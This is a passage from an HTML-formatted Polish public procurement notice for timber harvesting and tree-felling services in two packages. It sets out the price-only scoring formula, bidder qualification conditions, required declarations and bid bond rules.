dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert Zamawiający będzie się kierował następującym kryterium oceny ofert:<br/>Cena – 100 %<br/>2. Sposób obliczania punktów:<br/>W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>Cn<br/>C = ------------ x 100 % x 100 pkt<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w Formularzu Oferty (Załącznik nr 1 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego<br/>obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do<br/>przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>3. Za najkorzystniejszą ofertę uznana zostanie Oferta Wykonawcy, która uzyska największą liczbę punktów.<br/>4. Jeżeli nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie,<br/>Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert<br/>dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają<br/>wykluczeniu oraz spełniają określone przez Zamawiającego warunki udziału<br/>w postępowaniu.<br/>2. W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania<br/>tego warunku udziału w postępowaniu.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania<br/>tego warunku udziału w postępowaniu.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania<br/>warunku udziału w postępowaniu w odniesieniu do warunku dot. sytuacji<br/>ekonomicznej.<br/>Warunek w odniesieniu do sytuacji finansowej, zostanie spełniony, jeśli<br/>Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową mniejszą niż:<br/>I) dla Pakietu nr 01: 5 000 zł<br/>II) dla Pakietu nr 02: 30 000 zł<br/>4) zdolności technicznej lub zawodowej:<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za<br/>spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 3 lat<br/>liczonych wstecz od dnia, w którym upływa termin składania ofert<br/>(a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie) zrealizował lub realizuje (przy czym w tym przypadku<br/>będzie uwzględniana wartość zrealizowanej części przedmiotu<br/>umowy), na podstawie jednej lub większej ilości umów, usługi z<br/>zakresu pozyskania drewna na łączną kwotę brutto nie mniejszą niż:<br/>I) dla Pakietu nr 01: 50 000 zł<br/>II) dla Pakietu nr 02: 100 000 zł<br/>przy czym: (a) w przypadku Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, co najmniej jeden z takich Wykonawców<br/>powinien wykazać usługi z zakresu pozyskania drewna o wartości<br/>stanowiącej co najmniej 50% łącznej wartości usług wymaganej w<br/>treści niniejszego warunku, (b) w przypadku polegania na<br/>doświadczeniu podmiotów udostępniających zasoby, co najmniej<br/>jeden z takich podmiotów lub Wykonawca (a w przypadku<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia - co<br/>najmniej jeden z takich Wykonawców) powinien wykazać usługi z<br/>zakresu pozyskania drewna o wartości stanowiącej co najmniej 50%<br/>łącznej wartości usług wymaganej w treści niniejszego warunku,<br/>b) Warunek ten, w zakresie potencjału technicznego, zostanie<br/>uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub<br/>będzie dysponować:<br/>I) dla Pakietu nr 01:<br/>- co najmniej 1 szt. ciągników zrywkowych lub ciągników<br/>przystosowanych do zrywki drewna,<br/>- co najmniej 1 szt. przyczep samozaładowczych,<br/>lub<br/>- co najmniej 1 szt. ciągników zrywkowych lub ciągników<br/>przystosowanych do zrywki drewna,<br/>- co najmniej 1 szt. maszyn leśnych typu forwarder.<br/>II) dla Pakietu nr 02:<br/>- co najmniej 2 szt. ciągników zrywkowych lub ciągników<br/>przystosowanych do zrywki drewna,<br/>- co najmniej 1 szt. przyczep samozaładowczych,<br/>lub<br/>- co najmniej 1 szt. ciągników zrywkowych lub ciągników<br/>przystosowanych do zrywki drewna,<br/>- co najmniej 1 szt. maszyn leśnych typu forwarder.<br/>c) Warunek ten, w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca<br/>wykaże, że dysponuje lub będzie dysponować:<br/>- osobami, które ukończyły z wynikiem pozytywnym szkolenie<br/>dopuszczające do pracy z pilarką zgodnie z § 21 rozporządzenia<br/>Ministra Środowiska z dnia 24 sierpnia 2006 r. w sprawie<br/>bezpieczeństwa i higieny pracy przy wykonywaniu niektórych prac z<br/>zakresu gospodarki leśnej (Dz. U. z 2006 r. Nr 161, poz. 1141) lub<br/>posiadające odpowiadające im uprawnienia wydane na podstawie<br/>poprzednio obowiązujących przepisów albo odpowiadające im<br/>uprawnienia wydane w innych Państwach Członkowskich Unii<br/>Europejskiej;<br/>I) dla Pakietu nr 01 - co najmniej 1 osoba<br/>II) dla Pakietu nr 02 - co najmniej 2 osoby<br/>- osobami do obsługi ciągników zrywkowych i maszyn leśnych typu<br/>forwarder<br/>I) dla Pakietu nr 01 - co najmniej 1 osoba<br/>II) dla Pakietu nr 02 - co najmniej 2 osoby<br/>3. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie<br/>zgodnie z formułą „spełnia”/„nie spełnia”, w oparciu o informacje zawarte w<br/>dokumentach i oświadczeniach, o których mowa w rozdziale 9.<br/>4. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może<br/>podlegać wykluczeniu z postępowania. W przypadku Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia warunki udziału w postępowaniu<br/>określone w pkt 5.2. powinni spełniać łącznie wszyscy Wykonawcy, z<br/>zastrzeżeniem, warunku opisanego w pkt 5.2. ppkt 4) lit. a) dotyczącego<br/>minimalnego poziomu procentowego (50 %) wartości usług jakie mają być zrealizowane przez jeden podmiot w ramach posiadanego doświadczenia. Działając<br/>na podstawie art. 117 ust. 1 PZP, w odniesieniu do warunku udziału w<br/>postępowaniu opisanego w pkt 5.2. ppkt 4) lit. a), Zamawiający wymaga, aby w<br/>przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, co<br/>najmniej jeden z takich wykonawców wykazał usługi z zakresu pozyskania i zrywki<br/>drewna, zagospodarowania lasu o wartości stanowiącej co najmniej 50% łącznej<br/>wartości usług wymaganej w treści tego warunku.<br/>5. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą<br/>polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji<br/>których te zdolności są wymagane. W przypadku, o którym mowa w pkt 5.2. ppkt 4)<br/>lit a) SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają<br/>do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni<br/>Wykonawcy.<br/>6. Wykonawca może w celu potwierdzenia spełniania warunków udziału<br/>w postępowaniu, polegać na zdolnościach technicznych lub zawodowych<br/>podmiotów udostępniających zasoby, niezależnie od charakteru prawnego<br/>łączących go z nimi stosunków prawnych, z zastrzeżeniem, że w przypadku<br/>powoływania się na zasoby podmiotu udostępniającego zasoby celem wykazania<br/>spełniania warunku udziału w postępowaniu w zakresie doświadczenia, warunek<br/>określony w pkt 5.2. ppkt 4) lit a) SWZ, co najmniej jeden z takich podmiotów lub<br/>wykonawca (a w przypadku wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia - co najmniej jeden z takich wykonawców) powinien wykazać usługi z<br/>zakresu pozyskania i zrywki drewna, o wartości stanowiącej co najmniej 50%<br/>łącznej wartości usług wymaganej w treści tego warunku.<br/>7. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych<br/>lub doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów<br/>udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji, których te zdolności są wymagane.<br/>8. Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające<br/>zasoby zdolności techniczne lub zawodowe, pozwalają na wykazanie przez<br/>Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w pkt<br/>5.2. ppkt 4) SWZ, a także bada, czy nie zachodzą wobec tego podmiotu podstawy<br/>wykluczenia, które zostały przewidziane w pkt 6.1. i 6.2. SWZ względem<br/>Wykonawcy.<br/>9. Jeżeli zdolności techniczne lub zawodowe, podmiotu udostępniającego zasoby nie<br/>potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu lub<br/>zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby<br/>Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot<br/>innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki<br/>udziału w postępowaniu.<br/>10. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na<br/>zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie<br/>składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby.<br/>11. Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby,<br/>musi udowodnić Zamawiającemu, że realizując zamówienie, faktycznie będzie<br/>dysponował zasobami tych podmiotów, w szczególności przedstawiając ich<br/>zobowiązanie do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji zamówienia (przykładowy wzór zobowiązania stanowi zał. nr 5 do<br/>SWZ).<br/>12. Podane przez Wykonawcę lub przez podmiot udostępniający zasoby, w celu wykazania spełniania warunków udziału w postępowaniu, wartości zrealizowanych robót budowlanych w walutach innych niż złoty polski (PLN) będą<br/>przeliczane na PLN w oparciu o średni kurs NBP obowiązujący w dniu publikacji<br/>ogłoszenia o zamówieniu. Jeżeli w tym dniu kurs danej waluty nie był ogłaszany w<br/>NBP, obowiązuje kurs ogłoszony bezpośrednio przed dniem publikacji ogłoszenia o<br/>zamówieniu. Tabele kursów walut dostępne są pod następującym adresem<br/>internetowym:<br/>http://www.nbp.pl/home.aspx?f=/Kursy/kursy.htm <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego<br/>Zamawiający żąda:<br/>a) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t. j. Dz.U. z 2021 r. poz. 275), z innym<br/>wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej<br/>(wzór oświadczenia stanowi Załącznik nr 6 do SWZ);<br/>b) oświadczenia wykonawcy o aktualności informacji zawartych w Oświadczeniu o niepodleganiu wykluczeniu i spełnianiu warunków<br/>udziału w postępowaniu, w zakresie podstaw wykluczenia z postępowania, o których mowa w:<br/>i. art. 108 ust. 1 pkt 1 ustawy PZP,<br/>ii. art. 108 ust. 1 pkt 2 ustawy PZP,<br/>iii. art. 108 ust. 1 pkt 3 ustawy PZP,<br/>iv. art. 108 ust. 1 pkt 4 ustawy PZP , dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego oraz tytułem środka karnego lub środka zabezpieczającego,<br/>v. art. 108 ust. 1 pkt 5 ustawy PZP dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie<br/>konkurencji,<br/>vi. art. 108 ust. 1 pkt 6 ustawy PZP,<br/>vii. art. 109 ust. 1 pkt 1 ustawy PZP, w tym również odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat<br/>lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz.U. z 2019 r. poz. 1170),*<br/>viii. art. 109 ust. 1 pkt 4 ustawy Pzp,<br/>ix. art. 109 ust. 1 pkt 5, pkt 7-10 ustawy Pzp<br/>x. art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. 2022 r., poz. 835).(wzór oświadczenia stanowi Załącznik nr<br/>10 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Na<br/>ofertę Wykonawcy składają się:<br/>1) Formularz oferty, sporządzony zgodnie z treścią załącznika nr 1 do SWZ<br/>2) Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez<br/>Zamawiającego odpowiednio w rozdziale 6 ust. 1, ust. 2 i ust. 9 oraz w rozdziale 5 ust. 2 ppkt. 4 ) SWZ. Oświadczenie to stanowić<br/>będzie dowód, potwierdzający brak podstaw wykluczenia lub spełnianie warunków udziału w postępowaniu na dzień składania ofert,<br/>tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe (wzór oświadczenia stanowi Załącznik nr<br/>4 do SWZ).<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu i spełnianiu<br/>warunków udziału w postępowaniu, o którym mowa powyżej, musi złożyć z osobna każdy z Wykonawców. Oświadczenia te mają<br/>potwierdzać brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3) Wykonawca, w przypadku polegania na zdolnościach podmiotów udostępniających zasoby, przedstawia wraz z oświadczeniem o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, także oświadczenie o niepodleganiu wykluczeniu i<br/>spełnianiu warunków udziału w postępowaniu podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego<br/>podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby (wzór<br/>oświadczenia stanowi Załącznik nr 5 do SWZ),<br/>4) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, ma obowiązek złożyć wraz z ofertą<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji zamówienia” lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa wyżej, powinno potwierdzać, że stosunek łączący Wykonawcę z<br/>podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określać w szczególności:<br/>a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy<br/>wykonywaniu zamówienia;<br/>Treść zobowiązania powinna bezspornie i jednoznacznie wskazywać na zakres zobowiązania innego podmiotu, określać, czego<br/>dotyczy zobowiązanie oraz w jaki sposób i w jakim okresie będzie ono wykonywane.<br/>5) W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, Wykonawca ma<br/>obowiązek złożyć odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru.<br/>Wykonawca nie jest zobowiązany do złożenia powyższych dokumentów, jeżeli Zamawiający może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>6) Jeżeli w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podmiotu udostępniającego<br/>zasoby lub podwykonawcy niebędącego podmiotem udostępniającym zasoby, działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z powyższych dokumentów, należy złożyć pełnomocnictwo lub inny dokument potwierdzający<br/>umocowanie do reprezentowania Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego,<br/>podmiotu udostępniającego zasoby lub podwykonawcy niebędącego podmiotem udostępniającym zasoby.<br/>Pełnomocnictwo powinno być złożone w oryginale w formie elektronicznej lub w postaci cyfrowego odwzorowania dokumentu<br/>sporządzonego w postaci papierowej (elektronicznej kopii), poświadczonej za zgodność z oryginałem przez mocodawcę albo<br/>notarialnie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Zamawiający nie przewiduje obowiązku przeprowadzenia przez Wykonawcę wizji lokalnej<br/>lub sprawdzenia przez niego dokumentów niezbędnych do realizacji zamówienia.<br/>2. Zamawiający nie przewiduje przedstawiania przez Wykonawców ofert wariantowych.<br/>3. Zamawiający nie przewiduje żądania składania przedmiotowych środków dowodowych.<br/>4. Zamawiający nie przewiduje rozliczenia z Wykonawcą w walutach obcych.<br/>5. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji<br/>elektronicznej.<br/>6. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>7. Zamawiający nie określa oraz nie nakłada do Wykonawcę osobistego wykonania<br/>kluczowych części przedmiotu zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w wysokości określonej poniżej dla Pakietu nr 02 - 2 000 zł.<br/>2. Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać<br/>nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków,<br/>o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/>3. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku<br/>następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt.<br/>2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (tekst jedn.: Dz. U. z 2023 r. poz. 462).<br/>4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>Zamawiającego w banku BGŻ BNP Paribas S.A. nr rachunku: 72 2030 0045 1110<br/>0000 0025 2270 z dopiskiem: „Wadium usługa wycinki pod S19 pakiet nr …..”<br/>Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie<br/>zostanie zaliczone na rachunku bankowym Zamawiającego. Wadium wniesione w<br/>pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>5. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji<br/>ubezpieczeniowej lub poręczeniach udzielonych przez podmioty, o których mowa<br/>w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji<br/>Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze<br/>pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą,<br/>zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 PZP.<br/>6. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 2.<br/>ppkt 2)-4) należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci<br/>elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznymi osób<br/>upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę na daną<br/>część zamówienia przez cały okres związania ofertą. Oferta Wykonawcy, który nie<br/>wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie<br/>utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży<br/>wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3) PZP<br/>zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14) PZP.<br/>7. Treść wadium wnoszonego w formie gwarancji lub poręczenia, o których mowa w<br/>pkt 2. ppkt 2)-4) SWZ musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia<br/>(Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej<br/>udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona<br/>gwarancją/poręczeniem – określenie przedmiotu zamówienia,<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i<br/>nieodwołalnie kwoty gwarancji/poręczenia na pierwsze pisemne żądanie<br/>Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>8. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>Zamawiający wymaga, aby w treści wadium wnoszonego w formach, o których<br/>mowa w pkt 2. ppkt 2)-3) SWZ zostali wymienieni wszyscy Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia albo powinno z niej wynikać, że<br/>Wykonawca, na którego gwarancja/poręczenie zostały wystawione działa w<br/>imieniu innych Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>bądź w ich treści powinien zostać ujęty szerszy zakres odpowiedzialności<br/>gwaranta/poręczyciela niż tylko dotyczący działań/zaniechań odnoszących się do<br/>Wykonawcy, na którego gwarancja/poręczenie to zostało wystawione (zob. wyrok<br/>Krajowej Izby Odwoławczej z dnia 24 czerwca 2020 r. sygn. akt KIO 662/20; wyrok<br/>Krajowej Izby Odwoławczej z dnia 15 czerwca 2020 r., sygn. akt KIO 970/20; wyrok<br/>Krajowej Izby Odwoławczej z dnia 31 lipca 2020 r., sygn. akt KIO 1183/20, uchwała<br/>Krajowej Izby Odwoławczej z dnia 11 marca 2021 r., sygn. akt KIO/KD 6/21). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może<br/>podlegać wykluczeniu z postępowania. W przypadku Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia warunki udziału w postępowaniu<br/>określone w pkt 5.2. powinni spełniać łącznie wszyscy Wykonawcy, z<br/>zastrzeżeniem, warunku opisanego w pkt 5.2. ppkt 4) lit. a) dotyczącego<br/>minimalnego poziomu procentowego (50 %) wartości usług jakie mają być zrealizowane przez jeden podmiot w ramach posiadanego doświadczenia. Działając na podstawie art. 117 ust. 1 PZP, w odniesieniu do warunku udziału w postępowaniu opisanego w pkt 5.2. ppkt 4) lit. a), Zamawiający wymaga, aby w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, co najmniej jeden z takich wykonawców wykazał usługi z zakresu pozyskania i zrywki drewna, zagospodarowania lasu o wartości stanowiącej co najmniej 50% łącznej wartości usług wymaganej w treści tego warunku.<br/>2. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W przypadku, o którym mowa w pkt 5.2. ppkt 4) lit a) SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>3. Wykonawca może w celu potwierdzenia spełniania warunków udziału<br/>w postępowaniu, polegać na zdolnościach technicznych lub zawodowych<br/>podmiotów udostępniających zasoby, niezależnie od charakteru prawnego<br/>łączących go z nimi stosunków prawnych, z zastrzeżeniem, że w przypadku<br/>powoływania się na zasoby podmiotu udostępniającego zasoby celem wykazania spełniania warunku udziału w postępowaniu w zakresie doświadczenia, warunek określony w pkt 5.2. ppkt 4) lit a) SWZ, co najmniej jeden z takich podmiotów lub wykonawca (a w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia - co najmniej jeden z takich wykonawców) powinien wykazać usługi z zakresu pozyskania i zrywki drewna, o wartości stanowiącej co najmniej 50% łącznej wartości usług wymaganej w treści tego warunku.<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji, których te zdolności są wymagane.<br/>5. Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w pkt 5.2. ppkt 4) SWZ, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane w pkt 6.1. i 6.2. SWZ względem Wykonawcy.<br/>6. Jeżeli zdolności techniczne lub zawodowe, podmiotu udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>7. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/>8. Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, musi udowodnić Zamawiającemu, że realizując zamówienie, faktycznie będzie dysponował zasobami tych podmiotów, w szczególności przedstawiając ich zobowiązanie do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia (przykładowy wzór zobowiązania stanowi zał. nr 5 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego zawiera projekt umowy stanowiący Załącznik nr 11 do SWZ.<br/>Umowa zostanie zawarta na podstawie złożonej oferty 